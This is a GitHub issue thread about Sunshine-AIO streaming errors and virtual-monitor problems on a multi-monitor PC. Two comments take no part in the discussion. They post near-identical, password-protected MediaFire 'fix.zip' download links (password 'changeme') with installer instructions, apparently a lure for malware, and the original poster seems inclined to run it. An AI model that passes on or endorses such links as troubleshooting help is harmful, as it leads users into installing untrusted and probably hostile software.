### ISSUE TITLE
keeps giving me error messages. (timed out, Failed to start the specified application)

### ISSUE THREAD

**Issue by forpoine** [LeGeRyChEeSe/Sunshine-AIO#9]
Prior to trying this AIO exe, i was using sunshine with resolution automation and monitor switcher which i was using command lines with. first try using sunshine AIO, when i tried opening an application it will give me error message with "Failed to start the specified application" without any error number, so i got rid of all the command lines manually and also from the extra menu from aio.exe which automatically gets rid of the command lines i assume? it still gave me the same issue anyway so i uninstalled sunshine and installed it again, getting rid of all the settings i've made changes to in order to fit my use the best. I'm using triple monitor and my gpu supports up to 4 monitors (4080 super) however my pc won't detect the idd sample monitor, which i do not think is supposed to be happening. Although i clean re-installed the whole sunshine and sunshine AIO, the only difference is once i launch an application from my mobile device the pc will deactivate two monitors but one monitor remaining, and the mouse control becomes laggy. i wait for the screen to pop up on my mobile but it will give me time out error message. i've already added my mobile resolution for the idd virtual monitor so I have no idea what's stopping me from making this work. Thanks

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by forpoine** [comment]
I think the idd sample driver version wasn't compatible with win10 i have right now, since i tried installing the idd driver without the hdr which is for win 10,11 it enabled an additional monitor. I'll give the exe file another try. thank you!
